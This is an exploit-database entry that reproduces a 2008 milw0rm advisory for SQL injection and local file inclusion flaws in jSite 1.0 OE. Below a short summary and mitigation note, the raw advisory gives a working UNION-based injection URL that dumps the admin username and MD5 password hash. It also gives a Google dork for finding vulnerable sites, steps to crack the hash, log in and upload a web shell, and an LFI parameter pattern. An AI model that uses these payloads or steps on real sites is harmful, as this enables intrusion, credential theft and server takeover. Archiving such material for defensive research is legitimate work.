jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility

vendor:

jSite 1.0 OE

by:

S.W.A.T.

9.3

CVSS

HIGH

SQL Injection & Local File Inclusion

89 (SQL Injection) & 98 (Local File Inclusion)

CWE

Product Name: jSite 1.0 OE

Affected Version From: 1.0 OE

Affected Version To: 1.0 OE

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility

A vulnerability exists in jSite 1.0 OE which allows an attacker to inject arbitrary SQL commands and perform a Local File Inclusion attack. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information such as usernames and passwords, and can also allow the attacker to upload malicious files to the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries. Also, ensure that the application is not vulnerable to Local File Inclusion attacks.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+              jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility                 +==--
--==+================================================================================+==--

-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=[ SQL Injection Exploit ]=-=-=-=-=-=-=-=-=-=-=-=-

AUTHOR: S.W.A.T.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-

Download: http://www.sclek.com/jsite.zip

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DORK (google): "Powered by jSite 1.0 OE"

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DESCRIPTION:
You Can See Admin User & MD5 Password ..::.. Then You Can Crack It & Login ;)

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

EXPLOITS:
www.site.com/?page=-1/**/union/**/select/**/1,2,3,concat_ws

(0x3a,user,pass),admin/**/from/**/jsite_users/*

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

NOTE/TIP:

1 Week Off & I Be Back :D ;)

Admin Login Is At /admin/

U Can Upload Your Shell When U Login Successfully
From This Link: www.site.com/admin/index.php?menu=uploads
& Your Shell Will Be Appear Here: www.site.com/uploads/[file].php

-=-=-=-=-=-=--=-=-=-=-=-=-=-[ Local File Inclusion ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Exploit:

 www.[target].com/Script/index.php?module=[LFI]


--==+================================================================================+==--
--==+              jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility                 +==--
--==+================================================================================+==--

# milw0rm.com [2008-07-12]